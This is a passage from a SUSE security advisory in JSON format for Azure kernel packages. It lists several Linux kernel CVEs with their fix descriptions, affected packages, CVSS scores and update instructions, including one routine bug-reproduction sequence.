"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71138"
},
{
"cve": "CVE-2025-71141",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71141"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tilcdc: Fix removal actions in case of failed probe\n\nThe drm_kms_helper_poll_fini() and drm_atomic_helper_shutdown() helpers\nshould only be called when the device has been successfully registered.\nCurrently, these functions are called unconditionally in tilcdc_fini(),\nwhich causes warnings during probe deferral scenarios.\n\n[ 7.972317] WARNING: CPU: 0 PID: 23 at drivers/gpu/drm/drm_atomic_state_helper.c:175 drm_atomic_helper_crtc_duplicate_state+0x60/0x68\n...\n[ 8.005820] drm_atomic_helper_crtc_duplicate_state from drm_atomic_get_crtc_state+0x68/0x108\n[ 8.005858] drm_atomic_get_crtc_state from drm_atomic_helper_disable_all+0x90/0x1c8\n[ 8.005885] drm_atomic_helper_disable_all from drm_atomic_helper_shutdown+0x90/0x144\n[ 8.005911] drm_atomic_helper_shutdown from tilcdc_fini+0x68/0xf8 [tilcdc]\n[ 8.005957] tilcdc_fini [tilcdc] from tilcdc_pdev_probe+0xb0/0x6d4 [tilcdc]\n\nFix this by rewriting the failed probe cleanup path using the standard\ngoto error handling pattern, which ensures that cleanup functions are\nonly called on successfully initialized resources. Additionally, remove\nthe now-unnecessary is_registered flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71141",
"url": "https://www.suse.com/security/cve/CVE-2025-71141"
},
{
"category": "external",
"summary": "SUSE Bug 1256756 for CVE-2025-71141",
"url": "https://bugzilla.suse.com/1256756"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71141"
},
{
"cve": "CVE-2025-71142",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71142"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpuset: fix warning when disabling remote partition\n\nA warning was triggered as follows:\n\nWARNING: kernel/cgroup/cpuset.c:1651 at remote_partition_disable+0xf7/0x110\nRIP: 0010:remote_partition_disable+0xf7/0x110\nRSP: 0018:ffffc90001947d88 EFLAGS: 00000206\nRAX: 0000000000007fff RBX: ffff888103b6e000 RCX: 0000000000006f40\nRDX: 0000000000006f00 RSI: ffffc90001947da8 RDI: ffff888103b6e000\nRBP: ffff888103b6e000 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000001 R11: ffff88810b2e2728 R12: ffffc90001947da8\nR13: 0000000000000000 R14: ffffc90001947da8 R15: ffff8881081f1c00\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f55c8bbe0b2 CR3: 000000010b14c000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n update_prstate+0x2d3/0x580\n cpuset_partition_write+0x94/0xf0\n kernfs_fop_write_iter+0x147/0x200\n vfs_write+0x35d/0x500\n ksys_write+0x66/0xe0\n do_syscall_64+0x6b/0x390\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f55c8cd4887\n\nReproduction steps (on a 16-CPU machine):\n\n # cd /sys/fs/cgroup/\n # mkdir A1\n # echo +cpuset \u003e A1/cgroup.subtree_control\n # echo \"0-14\" \u003e A1/cpuset.cpus.exclusive\n # mkdir A1/A2\n # echo \"0-14\" \u003e A1/A2/cpuset.cpus.exclusive\n # echo \"root\" \u003e A1/A2/cpuset.cpus.partition\n # echo 0 \u003e /sys/devices/system/cpu/cpu15/online\n # echo member \u003e A1/A2/cpuset.cpus.partition\n\nWhen CPU 15 is offlined, subpartitions_cpus gets cleared because no CPUs\nremain available for the top_cpuset, forcing partitions to share CPUs with\nthe top_cpuset. In this scenario, disabling the remote partition triggers\na warning stating that effective_xcpus is not a subset of\nsubpartitions_cpus. Partitions should be invalidated in this case to\ninform users that the partition is now invalid(cpus are shared with\ntop_cpuset).\n\nTo fix this issue:\n1. Only emit the warning only if subpartitions_cpus is not empty and the\n effective_xcpus is not a subset of subpartitions_cpus.\n2. During the CPU hotplug process, invalidate partitions if\n subpartitions_cpus is empty.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71142",
"url": "https://www.suse.com/security/cve/CVE-2025-71142"
},
{
"category": "external",
"summary": "SUSE Bug 1256748 for CVE-2025-71142",
"url": "https://bugzilla.suse.com/1256748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71142"
},
{
"cve": "CVE-2025-71143",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71143"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: samsung: exynos-clkout: Assign .num before accessing .hws\n\nCommit f316cdff8d67 (\"clk: Annotate struct clk_hw_onecell_data with\n__counted_by\") annotated the hws member of \u0027struct clk_hw_onecell_data\u0027\nwith __counted_by, which informs the bounds sanitizer (UBSAN_BOUNDS)\nabout the number of elements in .hws[], so that it can warn when .hws[]\nis accessed out of bounds. As noted in that change, the __counted_by\nmember must be initialized with the number of elements before the first\narray access happens, otherwise there will be a warning from each access\nprior to the initialization because the number of elements is zero. This\noccurs in exynos_clkout_probe() due to .num being assigned after .hws[]\nhas been accessed:\n\n UBSAN: array-index-out-of-bounds in drivers/clk/samsung/clk-exynos-clkout.c:178:18\n index 0 is out of range for type \u0027clk_hw *[*]\u0027\n\nMove the .num initialization to before the first access of .hws[],\nclearing up the warning.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71143",
"url": "https://www.suse.com/security/cve/CVE-2025-71143"
},
{
"category": "external",
"summary": "SUSE Bug 1256749 for CVE-2025-71143",
"url": "https://bugzilla.suse.com/1256749"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71143"
},
{
"cve": "CVE-2025-71145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: isp1301: fix non-OF device reference imbalance\n\nA recent change fixing a device reference leak in a UDC driver\nintroduced a potential use-after-free in the non-OF case as the\nisp1301_get_client() helper only increases the reference count for the\nreturned I2C device in the OF case.\n\nIncrement the reference count also for non-OF so that the caller can\ndecrement it unconditionally.\n\nNote that this is inherently racy just as using the returned I2C device\nis since nothing is preventing the PHY driver from being unbound while\nin use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71145",
"url": "https://www.suse.com/security/cve/CVE-2025-71145"
},
{
"category": "external",
"summary": "SUSE Bug 1257155 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "external",
"summary": "SUSE Bug 1257156 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "important"
}
],
"title": "CVE-2025-71145"
},
{
"cve": "CVE-2025-71147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKEYS: trusted: Fix a memory leak in tpm2_load_cmd\n\n\u0027tpm2_load_cmd\u0027 allocates a tempoary blob indirectly via \u0027tpm2_key_decode\u0027\nbut it is not freed in the failure paths. Address this by wrapping the blob\ninto with a cleanup helper.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71147",
"url": "https://www.suse.com/security/cve/CVE-2025-71147"
},
{
"category": "external",
"summary": "SUSE Bug 1257158 for CVE-2025-71147",
"url": "https://bugzilla.suse.com/1257158"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71147"
},
{
"cve": "CVE-2025-71149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/poll: correctly handle io_poll_add() return value on update\n\nWhen the core of io_uring was updated to handle completions\nconsistently and with fixed return codes, the POLL_REMOVE opcode\nwith updates got slightly broken. If a POLL_ADD is pending and\nthen POLL_REMOVE is used to update the events of that request, if that\nupdate causes the POLL_ADD to now trigger, then that completion is lost\nand a CQE is never posted.\n\nAdditionally, ensure that if an update does cause an existing POLL_ADD\nto complete, that the completion value isn\u0027t always overwritten with\n-ECANCELED. For that case, whatever io_poll_add() set the value to\nshould just be retained.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71149",
"url": "https://www.suse.com/security/cve/CVE-2025-71149"
},
{
"category": "external",
"summary": "SUSE Bug 1257164 for CVE-2025-71149",
"url": "https://bugzilla.suse.com/1257164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71149"
},
{
"cve": "CVE-2025-71154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71154"
}
],
"notes": [
{
"category": "general",
